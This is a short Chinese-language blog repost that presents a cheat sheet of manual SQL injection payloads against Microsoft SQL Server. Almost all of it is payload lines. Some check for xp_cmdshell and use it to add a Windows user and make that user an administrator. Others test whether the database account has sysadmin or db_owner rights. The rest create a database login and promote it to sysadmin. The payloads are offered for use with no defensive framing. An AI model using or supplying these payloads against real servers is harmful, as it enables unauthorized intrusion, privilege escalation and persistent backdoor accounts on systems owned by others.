SQL手工注入方法总结(私人收藏)

原创文章如转载，请注明：转载自冠威博客 [ http://www.guanwei.org/ ]
本文链接地址：http://www.guanwei.org/post/networksecurity/06/SQL-injection.html

 

原帖地址：http://bbs.cisps.org/viewtopic.php?f=48&t=22823

由于下载需要安全币，我就给大家共享了。花一个人的钱，所有人享受免费资料！

--是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')

--用xp_cmdshell执行命令
;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup name administrators /add"--

--查看权限
and (select IS_SRVROLEMEMBER('sysadmin'))=1-- //sa
and (select IS_MEMBER('db_owner'))=1-- // dbo
and (select IS_MEMBER('public'))=1-- //public

--创建个登陆mssql的帐号
;exec master.dbo.sp_addlogin name,pass;--

--把创建的mssql登陆帐号提升到sysadmin
;exec master.dbo.sp_addsrvrolemember name,sysadmin;--

有用的扩展

...........

主要是针对mssql的注入方法。很全面！